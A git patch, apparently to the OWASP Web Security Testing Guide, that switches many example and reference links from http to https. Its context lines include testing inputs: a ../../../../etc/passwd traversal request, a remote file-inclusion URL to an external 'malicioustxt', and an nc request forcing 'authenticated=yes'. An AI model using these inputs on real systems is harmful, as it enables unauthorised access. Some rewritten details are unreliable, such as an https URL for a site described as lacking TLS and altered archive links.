From aa765d2a0b638bf81017359b9fa315dc613bd15f Mon Sep 17 00:00:00 2001 From: Rick M Date: Mon, 16 Dec 2024 20:26:46 -0500 Subject: [PATCH 1/2] Move to HTTPS links --- .github/configs/.textlintrc | 2 +- REST_CS_Migrate.md | 8 +-- document/2-Introduction/README.md | 4 +- .../1-Penetration_Testing_Methodologies.md | 2 +- ..._Reconnaissance_for_Information_Leakage.md | 2 +- .../02-Fingerprint_Web_Server.md | 4 +- ...erver_Metafiles_for_Information_Leakage.md | 6 +- .../04-Enumerate_Applications_on_Webserver.md | 14 ++--- ...eb_Page_Content_for_Information_Leakage.md | 2 +- ...8-Fingerprint_Web_Application_Framework.md | 6 +- ...erenced_Files_for_Sensitive_Information.md | 4 +- .../06-Test_HTTP_Methods.md | 4 +- ..._Enumeration_and_Guessable_User_Account.md | 8 +-- ...ing_for_Bypassing_Authentication_Schema.md | 2 +- ...r_Authentication_in_Alternative_Channel.md | 4 +- ...esting_Directory_Traversal_File_Include.md | 10 +-- ...g_for_Insecure_Direct_Object_References.md | 8 +-- .../05-Testing_for_OAuth_Weaknesses.md | 4 +- ...r_OAuth_Authorization_Server_Weaknesses.md | 8 +-- ...1-Testing_for_Session_Management_Schema.md | 7 +-- .../03-Testing_for_Session_Fixation.md | 4 +- ...4-Testing_for_Exposed_Session_Variables.md | 4 +- ...-Testing_for_Cross_Site_Request_Forgery.md | 12 ++-- .../08-Testing_for_Session_Puzzling.md | 2 +- .../09-Testing_for_Session_Hijacking.md | 12 ++-- ...ting_for_Reflected_Cross_Site_Scripting.md | 17 +++-- ...Testing_for_Stored_Cross_Site_Scripting.md | 9 ++- ...04-Testing_for_HTTP_Parameter_Pollution.md | 12 ++-- .../05-Testing_for_SQL_Injection.md | 48 +++++++------- .../05.1-Testing_for_Oracle.md | 62 +++++++++---------- .../05.2-Testing_for_MySQL.md | 3 +- .../05.3-Testing_for_SQL_Server.md | 5 +- .../05.4-Testing_PostgreSQL.md | 14 ++--- .../05.5-Testing_for_MS_Access.md | 15 +++-- .../05.6-Testing_for_NoSQL_Injection.md | 4 +- .../06-Testing_for_LDAP_Injection.md | 6 +- .../07-Testing_for_XML_Injection.md | 4 +- .../08-Testing_for_SSI_Injection.md | 2 +- .../09-Testing_for_XPath_Injection.md | 4 +- .../10-Testing_for_IMAP_SMTP_Injection.md | 25 ++++---- .../11-Testing_for_Code_Injection.md | 7 +-- .../11.1-Testing_for_File_Inclusion.md | 13 ++-- .../12-Testing_for_Command_Injection.md | 15 +++-- .../14-Testing_for_Incubated_Vulnerability.md | 10 +-- ...15-Testing_for_HTTP_Splitting_Smuggling.md | 6 +- .../16-Testing_for_HTTP_Incoming_Requests.md | 4 +- .../17-Testing_for_Host_Header_Injection.md | 6 +- ...ting_for_Server-side_Template_Injection.md | 2 +- ...formation_Sent_via_Unencrypted_Channels.md | 2 +- .../00-Introduction_to_Business_Logic.md | 8 +-- .../02-Test_Ability_to_Forge_Requests.md | 3 +- .../03-Test_Integrity_Checks.md | 2 +- ..._of_Times_a_Function_Can_Be_Used_Limits.md | 1 - .../10-Test-Payment-Functionality.md | 1 - ...ting_for_DOM-based_Cross_Site_Scripting.md | 1 - .../03-Testing_for_HTML_Injection.md | 4 +- ...04-Testing_for_Client-side_URL_Redirect.md | 8 +-- .../05-Testing_for_CSS_Injection.md | 5 +- ...g_for_Client-side_Resource_Manipulation.md | 6 +- ...7-Testing_Cross_Origin_Resource_Sharing.md | 22 +++---- .../08-Testing_for_Cross_Site_Flashing.md | 21 +++---- .../09-Testing_for_Clickjacking.md | 8 +-- .../10-Testing_WebSockets.md | 6 +- .../11-Testing_Web_Messaging.md | 4 +- ...Testing_for_Cross_Site_Script_Inclusion.md | 8 +-- document/5-Reporting/02-Naming_Schemes.md | 8 +-- .../6-Appendix/A-Testing_Tools_Resource.md | 6 +- document/6-Appendix/B-Suggested_Reading.md | 14 +---- document/6-Appendix/F-Leveraging_Dev_Tools.md | 2 +- .../1-Testing_for_a_Cat_in_a_Box.md | 2 +- 70 files changed, 273 insertions(+), 305 deletions(-) diff --git a/.github/configs/.textlintrc b/.github/configs/.textlintrc index 33eddc4809..795e602d71 100644 --- a/.github/configs/.textlintrc +++ b/.github/configs/.textlintrc @@ -122,7 +122,7 @@ // Words and phrases "ID", "JavaScript", - // http://stackoverflow.com/questions/1151338/id-or-id-on-user-interface + // https://stackoverflow.com/questions/1151338/id-or-id-on-user-interface [ "id['’]s", "IDs" diff --git a/REST_CS_Migrate.md b/REST_CS_Migrate.md index 2d92c6cd4a..49c17915d5 100644 --- a/REST_CS_Migrate.md +++ b/REST_CS_Migrate.md @@ -14,7 +14,7 @@ RESTful web services (often called simply REST) are a light weight variant of We - In headers. - Structured parameters and responses using JSON or XML in a parameter values, request body or response body. Those are required to communicate machine useful information. - Custom authentication and session management, often utilizing custom security tokens: this is needed as machine to machine communication does not allow for login sequences. -- Lack of formal documentation. A [proposed standard for describing RESTful web services called WADL](http://www.w3.org/Submission/wadl/) was submitted by Sun Microsystems but was never officially adapted. +- Lack of formal documentation. A [proposed standard for describing RESTful web services called WADL](https://www.w3.org/Submission/wadl/) was submitted by Sun Microsystems but was never officially adapted. ## The challenge of security testing RESTful web services @@ -45,12 +45,12 @@ Analyze collected requests to determine the attack surface: - Look for non-standard parameters: - Look for abnormal HTTP headers - those would many times be header based parameters. - Determine if a URL segment has a repeating pattern across URLs. Such patterns can include a date, a number or an ID like string and indicate that the URL segment is a URL embedded parameter. - - For example: `http://server/srv/2013-10-21/use.php` + - For example: `https://server/srv/2013-10-21/use.php` - Look for structured parameter values - those may be JSON, XML or a non-standard structure. - If the last element of a URL does not have an extension, it may be a parameter. This is especially true if the application technology normally uses extensions or if a previous segment does have an extension. - - For example: `http://server/svc/Grid.asmx/GetRelatedListItems` + - For example: `https://server/svc/Grid.asmx/GetRelatedListItems` - Look for highly varying URL segments - a single URL segment that has many values may be parameter and not a physical directory. - - For example if the URL `http://server/src/XXXX/page` repeats with hundreds of value for `XXXX`, chances `XXXX` is a parameter. + - For example if the URL `https://server/src/XXXX/page` repeats with hundreds of value for `XXXX`, chances `XXXX` is a parameter. Verify non-standard parameters: in some cases (but not all), setting the value of a URL segment suspected of being a parameter to a value expected to be invalid can help determine if it is a path elements of a parameter. If a path element, the web server will return a *404* message, while for an invalid value to a parameter the answer would be an application level message as the value is legal at the web server level. diff --git a/document/2-Introduction/README.md b/document/2-Introduction/README.md index 7759a3e4f4..cbfcfd132b 100644 --- a/document/2-Introduction/README.md +++ b/document/2-Introduction/README.md @@ -306,11 +306,11 @@ The following examples show why automated black-box testing may not be effective ### Example 1: Magic Parameters -Imagine a simple web application that accepts a name-value pair of "magic" and then the value. For simplicity, the GET request may be: `http://www.host/application?magic=value` +Imagine a simple web application that accepts a name-value pair of "magic" and then the value. For simplicity, the GET request may be: `https://www.host/application?magic=value` To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. -The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now: `http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d` +The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now: `https://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d` Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30\^28 permutations, or trillions of HTTP requests. That is an electron in a digital haystack. diff --git a/document/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies.md b/document/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies.md index 175825831c..3ad1e0d0de 100644 --- a/document/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies.md +++ b/document/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies.md @@ -122,7 +122,7 @@ OSSTMM includes the following key sections: - [PCI Data Security Standard - Penetration TestingGuidance](https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf) - [PTES Standard](http://www.pentest-standard.org/index.php/Main_Page) -- [Open Source Security Testing Methodology Manual (OSSTMM)](http://www.isecom.org/research/osstmm.html) +- [Open Source Security Testing Methodology Manual (OSSTMM)](https://www.isecom.org/research.html#content5-9d) - [Technical Guide to Information Security Testing and Assessment NIST SP 800-115](https://csrc.nist.gov/publications/detail/sp/800-115/final) - [HIPAA Security Testing Guidance](https://www.hhs.gov/hipaa/for-professionals/security/guidance/cybersecurity/index.html) - [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage.md index 64c471dea2..948a0a2028 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage.md @@ -33,7 +33,7 @@ Use a search engine to search for potentially sensitive information. This may in Do not limit testing to just one search engine provider, as different search engines may generate different results. Search engine results can vary in a few ways, depending on when the engine last crawled content, and the algorithm the engine uses to determine relevant pages. Consider using the following (alphabetically listed) search engines: - [Baidu](https://www.baidu.com/), China's [most popular](https://en.wikipedia.org/wiki/Web_search_engine#Market_share) search engine. -- [Bing](https://www.bing.com/), a search engine owned and operated by Microsoft, and the second [most popular](https://en.wikipedia.org/wiki/Web_search_engine#Market_share) worldwide. Supports [advanced search keywords](http://help.bing.microsoft.com/#apex/18/en-US/10001/-1). +- [Bing](https://www.bing.com/), a search engine owned and operated by Microsoft, and the second [most popular](https://en.wikipedia.org/wiki/Web_search_engine#Market_share) worldwide. Supports [advanced search keywords](https://help.bing.microsoft.com/#apex/18/en-US/10001/-1). - [binsearch.info](https://binsearch.info/), a search engine for binary Usenet newsgroups. - [Common Crawl](https://commoncrawl.org/), "an open repository of web crawl data that can be accessed and analyzed by anyone." - [DuckDuckGo](https://duckduckgo.com/), a privacy-focused search engine that compiles results from many different [sources](https://help.duckduckgo.com/results/sources/). Supports [search syntax](https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/). diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md index 2810db742e..b547dc0c70 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md @@ -153,8 +153,8 @@ Server: lighttpd/1.4.54 - + "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + 400 Bad Request diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md index 69249046b8..57925bb1e0 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md @@ -50,7 +50,7 @@ Web spiders/robots/crawlers can [intentionally ignore](https://blog.isc2.org/isc The `robots.txt` file is retrieved from the web root directory of the web server. For example, to retrieve the `robots.txt` from `www.google.com` using `wget` or `curl`: ```bash -$ curl -O -Ss http://www.google.com/robots.txt && head -n5 robots.txt +$ curl -O -Ss https://www.google.com/robots.txt && head -n5 robots.txt User-agent: * Disallow: /search Allow: /search/about @@ -117,7 +117,7 @@ $ wget --no-verbose https://www.google.com/sitemap.xml && head -n8 sitemap.xml 2020-05-05 12:23:30 URL:https://www.google.com/sitemap.xml [2049] -> "sitemap.xml" [1] - + https://www.google.com/gmail/sitemap.xml @@ -131,7 +131,7 @@ Exploring from there a tester may wish to retrieve the gmail sitemap `https://ww ```xml - + https://www.google.com/intl/am/gmail/about/ diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver.md index c925e17ce4..2770f48b91 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver.md @@ -13,7 +13,7 @@ Security professionals are sometimes given a set of IP addresses as a target to Sometimes, the target specification is richer. The tester may be given a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names and the client may not even be aware of that (this is more likely to happen in large organizations). -Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., `http://www.example.com/some-strange-URL`), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces). +Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., `https://www.example.com/some-strange-URL`), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces). To address these issues, it is necessary to perform web application discovery. @@ -23,7 +23,7 @@ To address these issues, it is necessary to perform web application discovery. ## How to Test -Web application discovery is a process that aims to identify web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., test only the application located at the URL `http://www.example.com/`), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following examples examine a few techniques that can be employed to achieve this goal. +Web application discovery is a process that aims to identify web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., test only the application located at the URL `https://www.example.com/`), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following examples examine a few techniques that can be employed to achieve this goal. > Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as `192.168.1.100`), which, unless indicated otherwise, represent *generic* IP addresses and are used only for anonymity purposes. @@ -31,15 +31,15 @@ There are three factors influencing how many applications are related to a given 1. **Different Base URL** - The obvious entry point for a web application is `www.example.com`, i.e., with this shorthand notation we think of the web application originating at `http://www.example.com/` (the same applies for HTTPS). However, even though this is the most common situation, there is nothing forcing the application to start at `/`. + The obvious entry point for a web application is `www.example.com`, i.e., with this shorthand notation we think of the web application originating at `https://www.example.com/` (the same applies for HTTPS). However, even though this is the most common situation, there is nothing forcing the application to start at `/`. - For example, the same symbolic name may be associated to three web applications such as: `http://www.example.com/app1` `http://www.example.com/app2` `http://www.example.com/app3` + For example, the same symbolic name may be associated to three web applications such as: `https://www.example.com/app1` `https://www.example.com/app2` `https://www.example.com/app3` - In this case, the URL `http://www.example.com/` would not be associated with a meaningful page. The three applications would remain **hidden** unless the tester explicitly knows how to access them, i.e., the tester knows *app1*, *app2* or *app3*. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised. + In this case, the URL `https://www.example.com/` would not be associated with a meaningful page. The three applications would remain **hidden** unless the tester explicitly knows how to access them, i.e., the tester knows *app1*, *app2* or *app3*. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised. 2. **Non-standard Ports** - While web applications usually live on port 80 (HTTP) and 443 (HTTPS), there is nothing fixed or mandatory about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: `http[s]://www.example.com:port/`. For example, `http://www.example.com:20000/`. + While web applications usually live on port 80 (HTTP) and 443 (HTTPS), there is nothing fixed or mandatory about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: `http[s]://www.example.com:port/`. For example, `https://www.example.com:20000/`. 3. **Virtual Hosts** @@ -162,7 +162,7 @@ Reverse-IP services are similar to DNS inverse queries, with the difference that - [MxToolbox Reverse IP](https://mxtoolbox.com/ReverseLookup.aspx) - [DNSstuff](https://www.dnsstuff.com/) (multiple services available) -- [Net Square](https://web.archive.org/web/20190515092354/http://www.net-square.com/mspawn.html) (multiple queries on domains and IP addresses, requires installation) +- [Net Square](https://web.archive.org/web/20190515092354/https://www.net-square.com/mspawn.html) (multiple queries on domains and IP addresses, requires installation) #### Googling diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage.md index 36d1479e54..0a6e375be9 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage.md @@ -48,7 +48,7 @@ The tester may even find something like this: Check HTML version information for valid version numbers and Data Type Definition (DTD) URLs ```html - + ``` - `strict.dtd` -- default strict DTD diff --git a/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md b/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md index 67154706c6..a4f27d793c 100644 --- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md +++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md @@ -89,7 +89,7 @@ The cookie `CAKEPHP` has automatically been set, which gives information about t * Note the guidelines for Session names states: "The session name references * the session id in cookies and URLs. It should contain only alphanumeric * characters." -* @link http://php.net/session_name +* @link https://php.net/session_name */ Configure::write('Session.cookie', 'CAKEPHP'); ``` @@ -193,8 +193,8 @@ As can be seen in the following screenshot the listed file system path points to | phpBB | `` | | Joomla | `` | -| Drupal | `` | -| DotNetNuke | `DNN Platform - [http://www.dnnsoftware.com](http://www.dnnsoftware.com)` | +| Drupal | `` | +| DotNetNuke | `DNN Platform - [https://www.dnnsoftware.com](https://www.dnnsoftware.com)` | #### General Markers diff --git a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information.md b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information.md index 6823bd29e9..3c72bbed04 100644 --- a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information.md +++ b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information.md @@ -176,10 +176,8 @@ Vulnerability assessment tools tend to include checks to spot web directories ha Web spider tools - [wget](https://www.gnu.org/software/wget/) -- [Wget for Windows](http://www.interlog.com/~tcharron/wgetwin.html) -- [Sam Spade](https://web.archive.org/web/20090926061558/http://preview.samspade.org/ssw/download.html) - [Spike proxy includes a site crawler function](https://www.spikeproxy.com/) -- [Xenu](http://home.snafu.de/tilman/xenulink.html) +- [Xenu](https://home.snafu.de/tilman/xenulink.html) - [curl](https://curl.haxx.se) Some of them are also included in standard Linux distributions. Web development tools usually include facilities to identify broken links and unreferenced files. diff --git a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md index 0aaf5d4f1c..89d7ff9aa4 100644 --- a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md +++ b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md @@ -99,7 +99,7 @@ Host: example.org Or with cURL: ```bash -curl http://example.org/test.html -X DELETE +curl https://example.org/test.html -X DELETE ``` #### RESTful APIs @@ -255,6 +255,6 @@ HTTP/1.1 200 OK - [RFC 7231 - Hypertext Transfer Protocol (HTTP/1.1)](https://datatracker.ietf.org/doc/html/rfc7231) - [RFC 5789 - PATCH Method for HTTP](https://datatracker.ietf.org/doc/html/rfc5789) -- [HTACCESS: BILBAO Method Exposed](https://web.archive.org/web/20160616172703/http://www.kernelpanik.org/docs/kernelpanik/bme.eng.pdf) +- [HTACCESS: BILBAO Method Exposed](https://web.archive.org/web/20160616172703/https://www.kernelpanik.org/docs/kernelpanik/bme.eng.pdf) - [Fortify - Misused HTTP Method Override](https://vulncat.fortify.com/en/detail?id=desc.dynamic.xtended_preview.often_misused_http_method_override) - [Mozilla Developer Network - Safe HTTP Methods](https://developer.mozilla.org/en-US/docs/Glossary/Safe/HTTP) diff --git a/document/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.md b/document/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.md index 69c86842ea..abb5f9e059 100644 --- a/document/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.md +++ b/document/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.md @@ -82,8 +82,8 @@ Some web application release a specific error code or message that we can analyz For example: -- `http://www.foo.com/err.jsp?User=baduser&Error=0` -- `http://www.foo.com/err.jsp?User=gooduser&Error=2` +- `https://www.foo.com/err.jsp?User=baduser&Error=0` +- `https://www.foo.com/err.jsp?User=gooduser&Error=2` As is seen above, when a tester provides a user ID and password to the web application, they see a message indication that an error has occurred in the URL. In the first case they have provided a bad user ID and bad password. In the second, a good user ID and a bad password, so they can identify a valid user ID. @@ -98,8 +98,8 @@ Some of the common errors received from web servers are: Example: -- `http://www.foo.com/account1` - we receive from web server: 403 Forbidden -- `http://www.foo.com/account2` - we receive from web server: 404 file Not Found +- `https://www.foo.com/account1` - we receive from web server: 403 Forbidden +- `https://www.foo.com/account2` - we receive from web server: 404 file Not Found In the first case the user exists, but the tester cannot view the web page, in second case instead the user "account2" does not exist. By collecting this information testers can enumerate the users. diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md index 2d3bb46942..e3b8d0035c 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md @@ -43,7 +43,7 @@ If a web application implements access control only on the log in page, the auth Another problem related to authentication design is when the application verifies a successful log in on the basis of a fixed value parameters. A user could modify these parameters to gain access to the protected areas without providing valid credentials. In the example below, the "authenticated" parameter is changed to a value of "yes", which allows the user to gain access. In this example, the parameter is in the URL, but a proxy could also be used to modify the parameter, especially when the parameters are sent as form elements in a POST request or when the parameters are stored in a cookie. ```html -http://www.site.com/page.asp?authenticated=no +https://www.site.com/page.asp?authenticated=no raven@blackbox /home $nc www.site.com 80 GET /page.asp?authenticated=yes HTTP/1.0 diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md index 4d1ee5b7eb..a032f76bd3 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md @@ -35,9 +35,9 @@ Even if the scope of the test does not allow the alternative channels to be test ## Example -The primary website is `http://www.example.com` and authentication functions always take place on pages using TLS `https://www.example.com/myaccount/`. +The primary website is `https://www.example.com` and authentication functions always take place on pages using TLS `https://www.example.com/myaccount/`. -However, a separate mobile-optimized website exists that does not use TLS at all, and has a weaker password recovery mechanism `http://m.example.com/myaccount/`. +However, a separate mobile-optimized website exists that does not use TLS at all, and has a weaker password recovery mechanism `https://m.example.com/myaccount/`. ## Test Objectives diff --git a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md index 8dc34f87d0..97aa83263d 100644 --- a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md +++ b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md @@ -43,9 +43,9 @@ Here are some examples of the checks to be performed at this stage: - Are there request parameters which could be used for file-related operations? - Are there unusual file extensions? - Are there interesting variable names? - - `http://example.com/getUserProfile.jsp?item=ikki.html` - - `http://example.com/index.php?file=content` - - `http://example.com/main.cgi?home=index.htm` + - `https://example.com/getUserProfile.jsp?item=ikki.html` + - `https://example.com/index.php?file=content` + - `https://example.com/main.cgi?home=index.htm` - Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates? - `Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower` - `Cookie: USER=1826cc8f:PSTYLE=GreenDotRed` @@ -57,13 +57,13 @@ The next stage of testing is analyzing the input validation functions present in **Note:** To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting `/etc/passwd` from an IIS web server. ```text -http://example.com/getUserProfile.jsp?item=../../../../etc/passwd +https://example.com/getUserProfile.jsp?item=../../../../etc/passwd ``` Another common example is including content from an external source: ```text -http://example.com/index.php?file=http://www.owasp.org/malicioustxt +https://example.com/index.php?file=https://www.owasp.org/malicioustxt ``` The same can be applied to cookies or any other input vector that is used for dynamic page generation. diff --git a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References.md b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References.md index e38b89555c..f5c40378c2 100644 --- a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References.md +++ b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References.md @@ -27,7 +27,7 @@ Below are several typical scenarios for this vulnerability and the methods to te Sample request: ```text -http://foo.bar/somepage?invoice=12345 +https://foo.bar/somepage?invoice=12345 ``` In this case, the value of the *invoice* parameter is used as an index in an invoices table in the database. The application takes the value of this parameter and uses it in a query to the database. The application then returns the invoice information to the user. @@ -39,7 +39,7 @@ Since the value of *invoice* goes directly into the query, by modifying the valu Sample request: ```text -http://foo.bar/changepassword?user=someuser +https://foo.bar/changepassword?user=someuser ``` In this case, the value of the `user` parameter is used to tell the application for which user it should change the password. In many cases this step will be a part of a wizard, or a multi-step operation. In the first step the application will get a request stating for which user's password is to be changed, and in the next step the user will provide a new password (without asking for the current one). @@ -51,7 +51,7 @@ The `user` parameter is used to directly reference the object of the user for wh Sample request: ```text -http://foo.bar/showImage?img=img00011 +https://foo.bar/showImage?img=img00011 ``` In this case, the value of the `file` parameter is used to tell the application what file the user intends to retrieve. By providing the name or identifier of a different file (for example file=image00012.jpg) the attacker will be able to retrieve objects belonging to other users. @@ -63,7 +63,7 @@ To test for this case, the tester should obtain a reference the user is not supp Sample request: ```text -http://foo.bar/accessPage?menuitem=12 +https://foo.bar/accessPage?menuitem=12 ``` In this case, the value of the `menuitem` parameter is used to tell the application which menu item (and therefore which application functionality) the user is attempting to access. Assume the user is supposed to be restricted and therefore has links available only to access to menu items 1, 2 and 3. By modifying the value of `menuitem` parameter it is possible to bypass authorization and access additional application functionality. To test for this case the tester identifies a location where application functionality is determined by reference to a menu item, maps the values of menu items the given test user can access, and then attempts other menu items. diff --git a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md index e463791f8f..886c23a0e5 100644 --- a/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md +++ b/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md @@ -60,7 +60,7 @@ Host: as.example.com "code_verifier":"example", "grant_type":"authorization_code", "code":"example", - "redirect_uri":"http://client.example.com" + "redirect_uri":"https://client.example.com" } ``` @@ -137,7 +137,7 